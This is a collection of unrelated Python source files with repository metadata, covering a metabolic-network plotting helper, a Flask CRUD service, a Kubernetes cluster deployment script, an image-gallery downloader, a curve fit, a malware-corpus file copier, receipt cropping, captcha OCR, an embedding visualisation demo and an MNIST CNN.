irreversible_flux_right_x_value = 0.03 * flux_left_x_value + 0.97 * flux_right_x_value
current_row_center_y_value = (total_row_num - row_index - 0.5) * each_row_height
text_param_dict[item_key] = {
ParameterName.center: Vector(text_left_x_axis + text_width / 2, current_row_center_y_value),
ParameterName.string: text_content,
ParameterName.width: text_width,
ParameterName.height: each_row_height,
}
if item_type == ParameterName.metabolite:
item_content.set_center(Vector(patch_center_x_axis, current_row_center_y_value))
patch_raw_obj_dict[item_key] = item_content
elif item_type == ParameterName.reaction:
if isinstance(item_content, tuple):
reaction_num = len(item_content)
reaction_subrow_height = (each_row_height - 2 * multiple_reaction_up_down_distance) / reaction_num
for reaction_subindex, reaction_obj in enumerate(item_content):
current_subrow_y_value = (
current_row_center_y_value + each_row_height / 2 - multiple_reaction_up_down_distance -
(reaction_subindex + 0.5) * reaction_subrow_height)
if reaction_obj.reversible:
current_flux_right_x_value = flux_right_x_value
else:
current_flux_right_x_value = irreversible_flux_right_x_value
reaction_obj.extend_reaction_start_end_list([
(
ParameterName.normal,
Vector(current_flux_right_x_value, current_subrow_y_value),
Vector(flux_left_x_value, current_subrow_y_value),
{}
)
])
patch_raw_obj_dict[reaction_obj.reaction_name] = reaction_obj
elif isinstance(item_content, Reaction):
if item_content.reversible:
current_flux_right_x_value = flux_right_x_value
else:
current_flux_right_x_value = irreversible_flux_right_x_value
item_content.extend_reaction_start_end_list([
(
ParameterName.normal,
Vector(current_flux_right_x_value, current_row_center_y_value),
Vector(flux_left_x_value, current_row_center_y_value),
{}
)
])
patch_raw_obj_dict[item_key] = item_content
else:
raise ValueError()
row_index += 1
# row_index = 0
# for reaction_key, reaction_content in reaction_content_dict.items():
# current_row_center_y_value = (total_row_num - row_index - 0.5) * each_row_height
# text_content = text_content_dict[reaction_key]
# text_param_dict[reaction_key] = {
# ParameterName.center: Vector(text_left_x_axis + text_width / 2, current_row_center_y_value),
# ParameterName.string: text_content,
# ParameterName.width: text_width,
# ParameterName.height: each_row_height,
# }
# if isinstance(reaction_content, tuple):
# reaction_num = len(reaction_content)
# reaction_subrow_height = (each_row_height - 2 * multiple_reaction_up_down_distance) / reaction_num
# for reaction_subindex, reaction_obj in enumerate(reaction_content):
# current_subrow_y_value = (
# current_row_center_y_value + each_row_height / 2 - multiple_reaction_up_down_distance -
# (reaction_subindex + 0.5) * reaction_subrow_height)
# if reaction_obj.reversible:
# current_flux_right_x_value = flux_right_x_value
# else:
# current_flux_right_x_value = irreversible_flux_right_x_value
# reaction_obj.extend_reaction_start_end_list([
# (
# ParameterName.normal,
# Vector(current_flux_right_x_value, current_subrow_y_value),
# Vector(flux_left_x_value, current_subrow_y_value),
# {}
# )
# ])
# patch_raw_obj_dict[reaction_obj.reaction_name] = reaction_obj
# elif isinstance(reaction_content, Reaction):
# if reaction_content.reversible:
# current_flux_right_x_value = flux_right_x_value
# else:
# current_flux_right_x_value = irreversible_flux_right_x_value
# reaction_content.extend_reaction_start_end_list([
# (
# ParameterName.normal,
# Vector(current_flux_right_x_value, current_row_center_y_value),
# Vector(flux_left_x_value, current_row_center_y_value),
# {}
# )
# ])
# patch_raw_obj_dict[reaction_key] = reaction_content
# else:
# raise ValueError()
# row_index += 1
return patch_raw_obj_dict, text_param_dict, total_width, total_height
| LocasaleLab/Automated-MFA-2023 | figures/figure_plotting/figure_elements/metabolic_network/layout_generator_functions/legend_layout_generator.py | legend_layout_generator.py | py | 11,543 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "config.MetaboliteConfig.width",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "config.MetaboliteConfig",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "metabolic_network_contents.metabolite.Metabolite",
"line_number": 12,
"usage_typ... |
42194340126 | import datetime
import math
from sqlalchemy import desc, asc
from app.main import db
from app.main.model.unit import Unit
from app.main.service.language_helper import LanguageHelper
def save_unit(data, args):
errors = {}
language_data = LanguageHelper(args)
# Check unique field is null or not
if data['name'] == "":
errors['name'] = [language_data.get_message(
'unit.save.no_unit_name_message')]
if len(errors) > 0:
response_object = {
'status': 'FAILED',
'message': language_data.get_message('unit.save.failed_message'),
'errors': errors
}
return response_object, 200
else:
unit = Unit.query.filter_by(
name=data['name']).first()
if unit:
errors['name'] = [language_data.get_message(
'unit.save.existed_unit_name_message')]
response_object = {
'status': 'FAILED',
'message': language_data.get_message('unit.save.failed_message'),
'errors': errors
}
return response_object, 200
else:
new_unit = Unit(
name=data['name'],
description=data['description'],
created_on=datetime.datetime.utcnow(),
updated_on=datetime.datetime.utcnow()
)
save_changes(new_unit)
output = {}
output['name'] = new_unit.name
output['description'] = new_unit.description
output['created_on'] = str(new_unit.created_on)
output['updated_on'] = str(new_unit.updated_on)
response_object = {
'status': 'SUCCESS',
'message': language_data.get_message('unit.save.success_message'),
'data': output
}
return response_object, 201
def update_unit(id, data, args):
unit = Unit.query.filter_by(id=id).first()
is_updated = False
errors = {}
language_data = LanguageHelper(args)
# Check if ID is valid or not
if not unit:
errors['id'] = ["Unit ID does not exist!"]
response_object = {
'status': 'FAILED',
'message': language_data.get_message('unit.update.failed_message'),
'errors': errors
}
return response_object, 200
else:
# Check null
if data['name'] == "":
errors['name'] = [language_data.get_message(
'unit.update.no_unit_message')]
if (len(errors) > 0):
response_object = {
'status': 'FAILED',
'message': language_data.get_message('unit.update.failed_message'),
'errors': errors
}
return response_object, 200
else:
if data['name'] != unit.name:
# Check if unit name is existed or not
updated_unit = Unit.query.filter_by(name=data['name']).first()
if updated_unit:
errors['name'] = [language_data.get_message(
'unit.update.existed_unit_name_message')]
response_object = {
'status': 'FAILED',
'message': language_data.get_message('unit.update.failed_message'),
'errors': errors
}
return response_object, 200
else:
is_updated = True
unit.name = data['name']
if data['description'] != unit.description:
is_updated = True
unit.description = data['description']
if is_updated is True:
unit.updated_on = datetime.datetime.utcnow()
db.session.commit()
unit_data = {}
unit_data['id'] = str(unit.id)
unit_data['name'] = unit.name
unit_data['description'] = unit.description
unit_data['created_on'] = str(unit.created_on)
unit_data['updated_on'] = str(unit.updated_on)
respone_object = {
'status': 'SUCCESS',
'message': language_data.get_message('unit.update.success_message'),
'data': unit_data
}
return respone_object, 200
def get_all_units(args):
all_unit = Unit.query.all()
output = []
languages_data = LanguageHelper(args)
for unit in all_unit:
unit_data = {}
unit_data['id'] = unit.id
unit_data['name'] = unit.name
unit_data['description'] = unit.description
unit_data['created_on'] = str(unit.created_on)
unit_data['updated_on'] = str(unit.updated_on)
output.append(unit_data)
data = {}
data['units'] = output
respone_object = {
'status': 'SUCCESS',
'message': languages_data.get_message('unit.get_all.success_message'),
'data': data
}
return respone_object, 200
def get_unit(id, args):
unit = Unit.query.filter_by(id=id).first()
languages_data = LanguageHelper(args)
if not unit:
respone_object = {
'status': 'ERROR',
'message': languages_data.get_message('unit.get.no_unit_message')
}
return respone_object, 200
unit_data = {}
unit_data['id'] = unit.id
unit_data['name'] = unit.name
unit_data['description'] = unit.description
unit_data['created_on'] = str(unit.created_on)
unit_data['updated_on'] = str(unit.updated_on)
respone_object = {
'status': 'SUCCESS',
'message': languages_data.get_message('unit.delete.success_message'),
'data': unit_data
}
return respone_object, 200
def delete_unit(id, args):
errors = {}
unit = Unit.query.filter_by(id=id).first()
languages_data = LanguageHelper(args)
if not unit:
respone_object = {
'status': 'FAILED',
'message': languages_data.get_message('unit.delete.no_unit_message'),
'errors': errors
}
return respone_object, 200
else:
db.session.delete(unit)
db.session.commit()
response_object = {
'status': 'SUCCESS',
'message': languages_data.get_message('unit.delete.success_message')
}
return response_object, 200
def save_changes(data):
db.session.add(data)
db.session.commit()
def get_all_units_with_pagination(args):
# Query Params
page_size = 10
current_page = 1
next_page = False
key_word = None
sort_field = None
sort_order = -1
# Check query param value
if "page_size" in args:
page_size = int(args['page_size'])
if "current_page" in args:
current_page = int(args['current_page'])
if "key_word" in args:
key_word = args['key_word']
if "sort_field" in args:
sort_field = args['sort_field']
if "sort_order" in args:
sort_order = int(args['sort_order'])
# Get language data
languages_data = LanguageHelper(args)
# Sort by order value
if sort_field is None or sort_order is None:
'''Default order by the lasted created_on value'''
units = Unit.query.order_by(Unit.created_on.desc())
else:
if sort_order == -1:
units = Unit.query.order_by(desc(sort_field))
else:
units = Unit.query.order_by(asc(sort_field))
units_on_page = units.limit(page_size).offset(
(current_page - 1) * page_size)
total_pages = math.ceil(units.count() / page_size)
if math.ceil(units.count() - page_size*current_page > 0):
next_page = True
else:
next_page = False
output = []
for unit in units_on_page:
# Sort by keyword
if (key_word is not None):
if (key_word in unit.name.lower()) or (
key_word in unit.description.lower()):
unit_data = {}
unit_data['id'] = unit.id
unit_data['name'] = unit.name
unit_data['description'] = unit.description
unit_data['created_on'] = str(unit.created_on)
unit_data['updated_on'] = str(unit.updated_on)
output.append(unit_data)
else:
unit_data = {}
unit_data['id'] = unit.id
unit_data['name'] = unit.name
unit_data['description'] = unit.description
unit_data['created_on'] = str(unit.created_on)
unit_data['updated_on'] = str(unit.updated_on)
output.append(unit_data)
data = {}
data['units'] = output
data['total_pages'] = total_pages
data['current_page'] = current_page
data['has_next_page'] = next_page
response_object = {
'status': 'SUCCESS',
'message': languages_data.get_message('unit.get_all_with_pagination.success_message'),
'data': data
}
return response_object, 200
| viettiennguyen029/recommendation-system-api | app/main/service/unit_service.py | unit_service.py | py | 9,022 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "app.main.service.language_helper.LanguageHelper",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "app.main.model.unit.Unit.query.filter_by",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "app.main.model.unit.Unit.query",
"line_number": 27,
... |
2036516482 | import os
import pathlib
import argparse
import uuid
import logging
import subprocess
from nuvoloso.dependencies.install_packages import InstallPackages
from nuvoloso.dependencies.kops_cluster import KopsCluster
from nuvoloso.dependencies.kubectl_helper import KubectlHelper
from nuvoloso.api.nuvo_management import NuvoManagement
DEFAULT_AMI = '099720109477/ubuntu/images/hvm-ssd/ubuntu-bionic-18.04-amd64-server-20190212.1'
DEFAULT_CENTRALD_CLUSTER_NAME = "nuvotestfiomulti.k8s.local"
NUVO_CLUSTER_NAME = "./nuvo_cluster_name.txt"
class CreateAppCluster:
def __init__(self, args):
self.args = args
if not args.create_only:
self.nuvo_mgmt = NuvoManagement(args)
self.kubectl_helper = KubectlHelper(args)
def install_dependencies(self):
InstallPackages.apt_get_update()
InstallPackages.install_kops()
InstallPackages.install_kubectl()
InstallPackages.install_awscli()
InstallPackages.configure_aws(self.args)
InstallPackages.generate_sshkeypair()
return
def set_protection_domains(self, csp_domain_id, nuvo_cluster_name):
accounts = self.nuvo_mgmt.get_all_accounts()
admin_account = self.args.account_name
for account in accounts:
# Creating spa to authorize accounts, so it can set protection domains
self.nuvo_mgmt.do_service_plan_allocation(nuvo_cluster_name, account['name'])
self.nuvo_mgmt.switch_accounts(account['name'])
protection_domain_id = self.nuvo_mgmt.create_protection_domain()
self.nuvo_mgmt.set_protection_domain(protection_domain_id, csp_domain_id)
self.nuvo_mgmt.switch_accounts(admin_account)
def create_application_cluster(self):
self.install_dependencies()
KopsCluster.create_kops_app_cluster(self.args)
if self.args.create_only:
return
try:
csp_domain_id = self.nuvo_mgmt.create_csp_domain()
nuvo_cluster_name = self.nuvo_mgmt.deploy_clusterd(csp_domain_id)
logging.info("Nuvo cluster created : %s", nuvo_cluster_name)
self.set_protection_domains(csp_domain_id, nuvo_cluster_name)
snapshot_catalog_pd = self.nuvo_mgmt.create_protection_domain()
self.nuvo_mgmt.set_snapshot_catalog_policy(snapshot_catalog_pd, csp_domain_id)
except subprocess.CalledProcessError as err:
if err.output: logging.info(err.output)
raise
return nuvo_cluster_name
def main():
"""main"""
default_cluster_name = DEFAULT_CENTRALD_CLUSTER_NAME
default_aws_access_key = default_aws_secret_access_key = default_kops_state_store = None
if os.environ.get('KOPS_CLUSTER_NAME'):
default_cluster_name = os.environ.get('KOPS_CLUSTER_NAME')
if os.environ.get('KOPS_STATE_STORE') is None:
default_kops_state_store = os.environ.get('KOPS_STATE_STORE')
if os.environ.get('AWS_ACCESS_KEY_ID'):
default_aws_access_key = os.environ.get('AWS_ACCESS_KEY_ID')
if os.environ.get('AWS_SECRET_ACCESS_KEY') is None:
default_aws_secret_access_key = os.environ.get('AWS_SECRET_ACCESS_KEY')
parser = argparse.ArgumentParser(description="Deploys a kops cluster with "
"Nuvo data plane and runs fio against all volumes")
parser.add_argument(
'--kops_cluster_name', help='name of kops cluster for Nuvo Data Plane[default: ' +
default_cluster_name + ']',
default=default_cluster_name)
parser.add_argument(
'--nodes', help='number of nodes in the cluster [default=3]', type=int, default=3,
choices=range(1, 101))
parser.add_argument(
'--kops_state_store', help='state store for cluster',
default=default_kops_state_store)
parser.add_argument(
'--aws_access_key', help='aws AccessKey', default=default_aws_access_key)
parser.add_argument(
'--aws_secret_access_key', help='aws SecretAccessKey',
default=default_aws_secret_access_key)
parser.add_argument(
'--region', help='aws region', default=None)
parser.add_argument(
'--k8s_master_zone', help='aws zone for master node',
default=None)
parser.add_argument(
'--k8s_nodes_zone', help='aws zone for other nodes ',
default=None)
parser.add_argument(
'--master_size', help='ec2 instance type for master node ', default=None)
parser.add_argument(
'--node_size', help='ec2 instance type for other nodes ', default=None)
parser.add_argument(
'--nuvo_kontroller_hostname', help='Hostname of https svc of Nuvo Kontroller')
parser.add_argument(
'--log_dirpath', help='log dir to hold test and nuvo logs', default=None)
parser.add_argument(
'--kubernetes_version', help='version of kubernetes to deploy', default='1.14.8')
parser.add_argument(
'--image', help='AMI Image for all instances', default=DEFAULT_AMI)
parser.add_argument(
'--node_volume_size', help='volume size for slave nodes of k8s cluster', type=int,
default=10)
parser.add_argument(
'--master_volume_size', help='volume size for master node of k8s cluster', type=int,
default=20)
parser.add_argument(
'--account_name', help='Nuvoloso account name', default='Demo Tenant')
parser.add_argument(
'--create_only', help='Create cluster only, skip Nuvoloso config', action='store_true')
args = parser.parse_args()
assert(args.kops_cluster_name and args.region and args.kops_state_store and args.aws_access_key
and args.aws_secret_access_key), "Some/all input parameters are not filled. Aborting"
if not args.create_only and args.nuvo_kontroller_hostname == None:
logging.error("Must specify nuvo kontroller hostname")
return
home_dir = pathlib.Path.home()
args.log_dirpath = args.log_dirpath if args.log_dirpath else str(home_dir.joinpath("logs-%s" % str(uuid.uuid4())[:5]))
pathlib.Path(args.log_dirpath).mkdir(parents=True, exist_ok=True)
logging.basicConfig(format='%(asctime)s %(message)s', filename=pathlib.Path(args.log_dirpath).joinpath(
"%s.log" % os.path.basename(__file__)), level=logging.INFO)
print("Script to deploy an application cluster")
test = CreateAppCluster(args)
nuvo_cluster_name = test.create_application_cluster()
if not args.create_only:
with open(NUVO_CLUSTER_NAME, 'w') as fd:
fd.write(nuvo_cluster_name)
logging.info("Application cluster name created: %s", nuvo_cluster_name)
else:
logging.info("Application cluster created: %s", args.kops_cluster_name)
if __name__ == '__main__':
main()
| Nuvoloso/testing_open_source | testingtools/deploy_app_cluster.py | deploy_app_cluster.py | py | 6,776 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "nuvoloso.api.nuvo_management.NuvoManagement",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "nuvoloso.dependencies.kubectl_helper.KubectlHelper",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "nuvoloso.dependencies.install_packages.InstallPack... |
75002646183 | from concurrent.futures import ThreadPoolExecutor,wait,as_completed
from socket import timeout
from turtle import done
from unittest.result import failfast
import requests
import re
import warnings
import os
import traceback
import importlib
warnings.filterwarnings('ignore')
url='https://e-hentai.org'
slist=[]
cookie=input("input your login cookie if any:")
head={
"Connection": '''keep-alive''',
"Pragma": '''no-cache''',
"Cache-Control": '''no-cache''',
"sec-ch-ua": '''" Not A;Brand";v="99", "Chromium";v="98", "Microsoft Edge";v="98"''',
"sec-ch-ua-mobile": '''?0''',
"sec-ch-ua-platform": '''"Windows"''',
"DNT": '''1''',
"Upgrade-Insecure-Requests": '''1''',
"User-Agent": '''Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.43''',
"Accept": '''text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9''',
"Sec-Fetch-Site": '''same-origin''',
"Sec-Fetch-Mode": '''navigate''',
"Sec-Fetch-User": '''?1''',
"Sec-Fetch-Dest": '''document''',
"Referer": '''https://e-hentai.org/home.php''',
"Accept-Encoding": '''gzip, deflate, br''',
"Accept-Language": '''zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6''',
"Cookie": f"{cookie}"
}
gid=input("example url:https://e-hentai.org/g/2134055/c28c645647/?p=1\nexample gallery id:2134055/c28c645647\ninput the e-hentai gallery id to download:")
try:os.makedirs(gid)
except:pass
res=requests.get(f"{url}/g/{gid}",verify=False,headers=head)
endp=res.text.rfind(f'''</a></td><td onclick="document.location=this.firstChild.href"><a href="{url}/g/{gid}/?p=1" onclick="return false">''')
count=res.text[:endp]
try:count=int(count[count.rfind(">")+1:])
except:count=1
print("pages:",count)
reslist=re.findall('''<a href="https:\/\/e-hentai\.org\/s\/([a-z\d\-/]+?)">''',res.text)
slist.extend(reslist)
def get_limit():
res=requests.get(f"{url}/home.php",verify=False,headers=head)
relist=re.findall('''<p>You are currently at <strong>(\d+?)<\/strong>''',res.text)
return relist[0]
if cookie:
print("limit used:",get_limit())
def fetch_urls(pid):
global count,slist
print(f"fetching page {pid}/{count}...")
res=requests.get(f"{url}/g/{gid}/?p={pid}",verify=False,headers=head)
reslist=re.findall('''<a href="https:\/\/e-hentai\.org\/s\/([a-z\d\-/]+?)">''',res.text)
slist.extend(reslist)
threads=ThreadPoolExecutor(20)
for i in range(1,count):
threads.submit(fetch_urls,i)
threads.shutdown(True)
sdict={each:None for each in slist}
# finally:
num=len(slist)
print("total images:",num)
def fetch_images(i,key):
global num,sdict,slist
print(f"fetching image {i}/{num}...")
if sdict[key]:
print(f"cache {key} found!")
res=requests.get(sdict[key],verify=False,headers=head,timeout=600)
open(f"{gid}/{key[key.rfind('/')+1:]}.jpg","wb").write(res.content)
else:
res=requests.get(f"{url}/s/{key}" ,verify=False,headers=head)
# print(res.text)
if cookie:
ourl=re.findall('''<a href="(https:\/\/e-hentai\.org\/fullimg\.php\?[\w=;&\-]+?)">''',res.text)[0].replace("&","&")
# print(ourl)
res=requests.get(ourl,verify=False,headers=head,allow_redirects=False)
rurl=res.headers["location"]
print(f"resolving real img url of {key}...",rurl)
sdict[key]=rurl
res=requests.get(rurl,verify=False,headers=head,timeout=600)
open(f"{gid}/{key[key.rfind('/')+1:]}.jpg","wb").write(res.content)
print("limit used:",get_limit())
else:
murl=re.findall('''<img id="img" src="([\w:/;=\.\-]+?)"''',res.text)[0]
res=requests.get(murl,verify=False,headers=head)
print(f"not login! download 1280 img url of {key}...",murl)
open(f"{gid}/{key[key.rfind('/')+1:]}_1280.jpg","wb").write(res.content)
slist.remove(key)
with ThreadPoolExecutor(max_workers=60) as t:
for j in range(int((num+59)//60)):
all_task = [t.submit(fetch_images,i+j*60,each) for i,each in enumerate(slist[j*60:(j+1)*60])]
lastundo=[]
undo=all_task
while len(lastundo)!=len(undo):
lastundo=undo
done,undo=wait(all_task, timeout=300)
# print(done,undo)
open(f"{gid}/info.py","w").write(f"{sdict}\n{slist}") | CrystalRays/pytools | ehentaidownloader.py | ehentaidownloader.py | py | 4,505 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "warnings.filterwarnings",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.makedirs",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "re.findall",
"li... |
71930911465 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 5 20:17:37 2017
@author: afranio
"""
import numpy as np
import matplotlib.pyplot as plt
# dados experimentais
# benzeno - pressao de vapor X temperatura
P = np.array([ 1, 5, 10, 20, 40, 60, 100, 200, 400, 760]) # mmHg
T = np.array([-36.7, -19.6, -11.5, -2.6, 7.6, 15.4, 26.1, 42.2, 60.6, 80.1]) # C
# grau do polinomio a ser ajustado
n = 4
# ajustar o polinomio
c = np.polyfit(T,P,n)
# avaliando o polinomio para cada T (comparar com os dados experimentais)
z = np.polyval(c,T)
# dominio de T ''continuo'' (para plotar a correlacao)
Tc = np.arange(-37,81.1,0.1)
plt.plot(Tc,c[4]+c[3]*Tc+c[2]*Tc**2+c[1]*Tc**3+c[0]*Tc**4,'-',T,P,'*')
plt.title('Pressao de vapor benzeno - ajustada com polinomio de quarto grau')
plt.xlabel('T (C)')
plt.ylabel('P (mm Hg)')
| afraniomelo/curso-matlab | codigos/python/ajuste_polinomio.py | ajuste_polinomio.py | py | 887 | python | pt | code | 0 | github-code | 36 | [
{
"api_name": "numpy.array",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "numpy.polyfit",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "numpy.polyval",
"line_numbe... |
23314260402 | import logging
import os
from malware_extractor import MalwareExtractor
logger = logging.getLogger(__name__)
class VXVaultExtractor(MalwareExtractor):
def process_input(self):
# files are just zip files, so can simply copy those across
self.copy_files()
if __name__ == "__main__":
logger.info("VXVault Extractor starting up.")
# assume mounted path is path to directory of files, so skipping any need for sub-directories.
collector_path = os.environ.get("COLLECTOR_PATH")
extractor_path = os.environ.get("EXTRACTOR_PATH")
extractor = VXVaultExtractor(collector_path, extractor_path)
extractor.process_input()
logger.info("VXVault Extractor completed.")
| g-clef/malware_extractor | VXVaultExtractor.py | VXVaultExtractor.py | py | 708 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "malware_extractor.MalwareExtractor",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "os.environ.get",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os... |
26498800829 | import requests
import json
import numpy as np
import cv2
import os
from tqdm import tqdm
def crop_receipt(raw_img):
"""Crop receipt from a raw image captured by phone
Args:
raw_img ([np.array]): Raw image containing receipt
Returns:
cropped_receipt ([np.array]): The image of cropped receipt
"""
CROP_RECEIPT_URL = 'http://service.aiclub.cs.uit.edu.vn/receipt/ript_detect'
ROTATE_RECEIPT_URL = 'http://service.aiclub.cs.uit.edu.vn/receipt/ript_rotate90/'
_, img_encoded = cv2.imencode('.jpg', raw_img)
detect_receipt = requests.post(CROP_RECEIPT_URL, files={"file": (
"filename", img_encoded.tostring(), "image/jpeg")}).json()
receipt_box = detect_receipt['receipt']
if receipt_box is not None:
crop = raw_img[receipt_box[1]:receipt_box[3], receipt_box[0]:receipt_box[2]]
img_crop_request = cv2.imencode('.jpg', crop)[1]
files = [
('img', img_crop_request.tostring())
]
rotated_func = requests.request("POST", "http://service.aiclub.cs.uit.edu.vn/receipt/ript_rotate90/", files=files).text
rotated_func = rotated_func.split('\n')
if rotated_func[0] != 'None' and float(rotated_func[1]) > 0.6:
dic_rotate_fuc = {'ROTATE_90_CLOCKWISE':cv2.ROTATE_90_CLOCKWISE, 'ROTATE_90_COUNTERCLOCKWISE':cv2.ROTATE_90_COUNTERCLOCKWISE, 'ROTATE_180':cv2.ROTATE_180}
crop = cv2.rotate(crop, dic_rotate_fuc[rotated_func[0]])
return crop
return raw_img | tiendv/MCOCR2021 | Task1/cropper.py | cropper.py | py | 1,516 | python | en | code | 9 | github-code | 36 | [
{
"api_name": "cv2.imencode",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "requests.post",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "cv2.imencode",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "requests.request",
"line_... |
12526381398 | from PIL import ImageGrab,Image
import pytesseract
def yz_code():
# bbox = (1348, 423, 1455, 455) # 截图范围,这个取决你验证码的位置
# img = ImageGrab.grab(bbox=bbox)
# img.save("D:\\py\\login\\image_code.jpg") # 设置路径
# img.show()
img = Image.open('img5.bmp') # PIL库加载图片
# print img.format, img.size, img.mode # 打印图片信息
img = img.convert('RGBA') # 转换为RGBA
pix = img.load() # 读取为像素
for x in range(img.size[0]): # 处理上下黑边框
pix[x, 0] = pix[x, img.size[1] - 1] = (255, 255, 255, 255)
for y in range(img.size[1]): # 处理左右黑边框
pix[0, y] = pix[img.size[0] - 1, y] = (255, 255, 255, 255)
for y in range(img.size[1]): # 二值化处理,这个阈值为R=95,G=95,B=95
for x in range(img.size[0]):
if pix[x, y][0] < 95 or pix[x, y][1] < 95 or pix[x, y][2] < 95:
pix[x, y] = (0, 0, 0, 255)
else:
pix[x, y] = (255, 255, 255, 255)
img.save("img5.png") # 由于tesseract限制,这里必须存到本地文件
image_temp = Image.open('img5.png')
signin_code = pytesseract.image_to_string(image_temp,lang='eng')
print(signin_code)
yz_code()
| SuneastChen/other_python_demo | 其他实例/验证码识别/图片处理1_pytesseract识别.py | 图片处理1_pytesseract识别.py | py | 1,285 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "PIL.Image.open",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "PIL.Image.open",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number"... |
71202438503 | # -*- coding: utf-8 -*-
# @Author: Luis Condados
# @Date: 2023-09-09 18:46:06
# @Last Modified by: Luis Condados
# @Last Modified time: 2023-09-16 18:33:43
import fiftyone as fo
import fiftyone.zoo as foz
import fiftyone.brain as fob
from sklearn.cluster import KMeans
import click
import logging
logging.basicConfig(level=logging.INFO)
def create_dataset_from_dir(images_dir, name=None, persistent=False):
dataset = fo.Dataset.from_images_dir(images_dir=images_dir,
name=name,
persistent=persistent,
recursive=True)
return dataset
@click.command()
@click.option('--images_dir', '-i')
@click.option('--dataset_name', '--name', '-n')
@click.option('--persistent', '-p', type=bool, default=True, is_flag=True)
@click.option('--n_clusters', default=None, type=int)
def main(images_dir, dataset_name, persistent, n_clusters):
if fo.dataset_exists(dataset_name):
logging.info('Dataset {} already exists.'.format(dataset_name))
dataset = fo.load_dataset(dataset_name)
else:
dataset = create_dataset_from_dir(images_dir, dataset_name)
dataset.persistent = persistent
####################
# Compute embeddings
####################
logging.info('Computing embedding ...')
#TIP: run foz.list_zoo_models() to see the whole list of models
# model = foz.load_zoo_model("mobilenet-v2-imagenet-torch")
model = foz.load_zoo_model('clip-vit-base32-torch')
embeddings = dataset.compute_embeddings(model)
logging.info('Working on the 2D for visualization ...')
# Image embeddings
fob.compute_visualization(dataset,
brain_key="latent_space",
embeddings=embeddings,
)
# to enable the "search for similarity" feature
fob.compute_similarity(dataset, embeddings=embeddings)
####################
# K-means Clustering
####################
if n_clusters != None:
logging.info('Computing k-means clustering ...')
k_means = KMeans(init="k-means++", n_clusters=n_clusters, n_init=10)
k_means.fit(embeddings)
for i, sample in enumerate(dataset):
cluster_id = k_means.labels_[i]
sample['cluster_id'] = cluster_id
sample.save()
################
# Launch the App
################
session = fo.launch_app(dataset)
# Blocks execution until the App is closed
session.wait()
if __name__ == "__main__":
main() | Gabriellgpc/exploratory_image_data_analysis | workspace/demo.py | demo.py | py | 2,617 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.basicConfig",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "logging.INFO",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "fiftyone.Dataset.from_images_dir",
"line_number": 19,
"usage_type": "call"
},
{
"api_name":... |
27890676766 | # -*- coding: utf-8 -*-
import tensorflow as tf
import tensorflow.examples.tutorials.mnist.input_data as input_data
import pdb
def weight_variable(shape):
"初始化权重"
initial = tf.truncated_normal(shape,stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
"初始化偏置项"
initial = tf.constant(.1,shape=shape)
return tf.Variable(initial)
def conv2d(x,W):
"1步长,0边距的卷积"
return tf.nn.conv2d(x,W,strides=[1,1,1,1],padding="SAME")
def max_pool_2x2(x):
"2x2的池化操作"
return tf.nn.max_pool(x,ksize=[1,2,2,1],strides=[1,2,2,1],padding="SAME")
if __name__ == "__main__":
x = tf.placeholder("float", shape=[None, 784])
y_ = tf.placeholder("float", shape=[None, 10])
mnist = input_data.read_data_sets("MNIST_data",one_hot=True)
sess = tf.InteractiveSession()
# create CNN
W_conv1 = weight_variable([5,5,1,32]) # 32个卷积核
b_conv1 = bias_variable([32])
x_image = tf.reshape(x,[-1,28,28,1])
h_conv1 = tf.nn.relu(conv2d(x_image,W_conv1)+b_conv1)
h_pool1 = max_pool_2x2(h_conv1)
W_conv2 = weight_variable([5,5,32,64]) # 64个卷积核
b_conv2 = bias_variable([64])
h_conv2 = tf.nn.relu(conv2d(h_pool1,W_conv2)+b_conv2)
h_pool2 = max_pool_2x2(h_conv2)
W_fc1 = weight_variable([7*7*64,1024]) # 图片尺寸减小为 7x7, 输入channel为 64,输入总数为 7x7x64???? 前面的padding 用的same, 这里图片大小应该还是28x28??
b_fc1 = bias_variable([1024])
h_pool2_flat = tf.reshape(h_pool2,[-1,7*7*64])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat,W_fc1)+b_fc1)
keep_prob = tf.placeholder("float")
h_fc1_drop = tf.nn.dropout(h_fc1,keep_prob)
W_fc2 = weight_variable([1024,10])
b_fc2 = bias_variable([10])
y_conv = tf.nn.softmax(tf.matmul(h_fc1_drop,W_fc2)+b_fc2)
